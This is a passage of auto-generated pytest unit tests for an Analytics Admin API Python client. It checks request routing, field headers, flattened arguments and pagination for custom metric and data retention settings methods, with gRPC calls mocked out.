analytics_admin.UpdateCustomMetricRequest() request.custom_metric.name = "custom_metric.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: call.return_value = resources.CustomMetric() client.update_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "custom_metric.name=custom_metric.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_custom_metric_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateCustomMetricRequest() request.custom_metric.name = "custom_metric.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) await client.update_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "custom_metric.name=custom_metric.name/value", ) in kw["metadata"] def test_update_custom_metric_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_custom_metric( custom_metric=resources.CustomMetric(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].custom_metric == resources.CustomMetric(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_custom_metric_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_custom_metric( analytics_admin.UpdateCustomMetricRequest(), custom_metric=resources.CustomMetric(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_custom_metric_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_custom_metric( custom_metric=resources.CustomMetric(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].custom_metric == resources.CustomMetric(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_custom_metric_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_custom_metric( analytics_admin.UpdateCustomMetricRequest(), custom_metric=resources.CustomMetric(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_list_custom_metrics( transport: str = "grpc", request_type=analytics_admin.ListCustomMetricsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomMetricsResponse( next_page_token="next_page_token_value", ) response = client.list_custom_metrics(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomMetricsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListCustomMetricsPager) assert response.next_page_token == "next_page_token_value" def test_list_custom_metrics_from_dict(): test_list_custom_metrics(request_type=dict) def test_list_custom_metrics_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: client.list_custom_metrics() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomMetricsRequest() @pytest.mark.asyncio async def test_list_custom_metrics_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListCustomMetricsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomMetricsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_custom_metrics(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomMetricsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListCustomMetricsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_custom_metrics_async_from_dict(): await test_list_custom_metrics_async(request_type=dict) def test_list_custom_metrics_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListCustomMetricsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: call.return_value = analytics_admin.ListCustomMetricsResponse() client.list_custom_metrics(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_custom_metrics_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListCustomMetricsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomMetricsResponse() ) await client.list_custom_metrics(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_custom_metrics_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomMetricsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_custom_metrics(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_custom_metrics_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_custom_metrics( analytics_admin.ListCustomMetricsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_custom_metrics_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomMetricsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomMetricsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_custom_metrics(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_custom_metrics_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_custom_metrics( analytics_admin.ListCustomMetricsRequest(), parent="parent_value", ) def test_list_custom_metrics_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomMetricsResponse( custom_metrics=[ resources.CustomMetric(), resources.CustomMetric(), resources.CustomMetric(), ], next_page_token="abc", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[], next_page_token="def", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(),], next_page_token="ghi", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(), resources.CustomMetric(),], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_custom_metrics(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.CustomMetric) for i in results) def test_list_custom_metrics_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomMetricsResponse( custom_metrics=[ resources.CustomMetric(), resources.CustomMetric(), resources.CustomMetric(), ], next_page_token="abc", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[], next_page_token="def", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(),], next_page_token="ghi", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(), resources.CustomMetric(),], ), RuntimeError, ) pages = list(client.list_custom_metrics(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_custom_metrics_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomMetricsResponse( custom_metrics=[ resources.CustomMetric(), resources.CustomMetric(), resources.CustomMetric(), ], next_page_token="abc", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[], next_page_token="def", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(),], next_page_token="ghi", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(), resources.CustomMetric(),], ), RuntimeError, ) async_pager = await client.list_custom_metrics(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.CustomMetric) for i in responses) @pytest.mark.asyncio async def test_list_custom_metrics_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_metrics), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomMetricsResponse( custom_metrics=[ resources.CustomMetric(), resources.CustomMetric(), resources.CustomMetric(), ], next_page_token="abc", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[], next_page_token="def", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(),], next_page_token="ghi", ), analytics_admin.ListCustomMetricsResponse( custom_metrics=[resources.CustomMetric(), resources.CustomMetric(),], ), RuntimeError, ) pages = [] async for page_ in (await client.list_custom_metrics(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_archive_custom_metric( transport: str = "grpc", request_type=analytics_admin.ArchiveCustomMetricRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.archive_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomMetricRequest() # Establish that the response is the type that we expect. assert response is None def test_archive_custom_metric_from_dict(): test_archive_custom_metric(request_type=dict) def test_archive_custom_metric_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: client.archive_custom_metric() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomMetricRequest() @pytest.mark.asyncio async def test_archive_custom_metric_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ArchiveCustomMetricRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.archive_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomMetricRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_archive_custom_metric_async_from_dict(): await test_archive_custom_metric_async(request_type=dict) def test_archive_custom_metric_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ArchiveCustomMetricRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: call.return_value = None client.archive_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_archive_custom_metric_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ArchiveCustomMetricRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.archive_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_archive_custom_metric_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.archive_custom_metric(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_archive_custom_metric_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.archive_custom_metric( analytics_admin.ArchiveCustomMetricRequest(), name="name_value", ) @pytest.mark.asyncio async def test_archive_custom_metric_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.archive_custom_metric(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_archive_custom_metric_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.archive_custom_metric( analytics_admin.ArchiveCustomMetricRequest(), name="name_value", ) def test_get_custom_metric( transport: str = "grpc", request_type=analytics_admin.GetCustomMetricRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) response = client.get_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT def test_get_custom_metric_from_dict(): test_get_custom_metric(request_type=dict) def test_get_custom_metric_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_metric), "__call__" ) as call: client.get_custom_metric() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomMetricRequest() @pytest.mark.asyncio async def test_get_custom_metric_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetCustomMetricRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) ) response = await client.get_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT @pytest.mark.asyncio async def test_get_custom_metric_async_from_dict(): await test_get_custom_metric_async(request_type=dict) def test_get_custom_metric_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetCustomMetricRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_metric), "__call__" ) as call: call.return_value = resources.CustomMetric() client.get_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_custom_metric_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetCustomMetricRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_metric), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) await client.get_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_custom_metric_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_custom_metric(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_custom_metric_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_custom_metric( analytics_admin.GetCustomMetricRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_custom_metric_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_custom_metric(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_custom_metric_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_custom_metric( analytics_admin.GetCustomMetricRequest(), name="name_value", ) def test_get_data_retention_settings( transport: str = "grpc", request_type=analytics_admin.GetDataRetentionSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings( name="name_value", event_data_retention=resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS, reset_user_data_on_new_activity=True, ) response = client.get_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataRetentionSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataRetentionSettings) assert response.name == "name_value" assert ( response.event_data_retention == resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS ) assert response.reset_user_data_on_new_activity is True def test_get_data_retention_settings_from_dict(): test_get_data_retention_settings(request_type=dict) def test_get_data_retention_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: client.get_data_retention_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataRetentionSettingsRequest() @pytest.mark.asyncio async def test_get_data_retention_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetDataRetentionSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings( name="name_value", event_data_retention=resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS, reset_user_data_on_new_activity=True, ) ) response = await client.get_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetDataRetentionSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataRetentionSettings) assert response.name == "name_value" assert ( response.event_data_retention == resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS ) assert response.reset_user_data_on_new_activity is True @pytest.mark.asyncio async def test_get_data_retention_settings_async_from_dict(): await test_get_data_retention_settings_async(request_type=dict) def test_get_data_retention_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDataRetentionSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: call.return_value = resources.DataRetentionSettings() client.get_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_data_retention_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetDataRetentionSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings() ) await client.get_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_data_retention_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_data_retention_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_data_retention_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_data_retention_settings( analytics_admin.GetDataRetentionSettingsRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_data_retention_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. 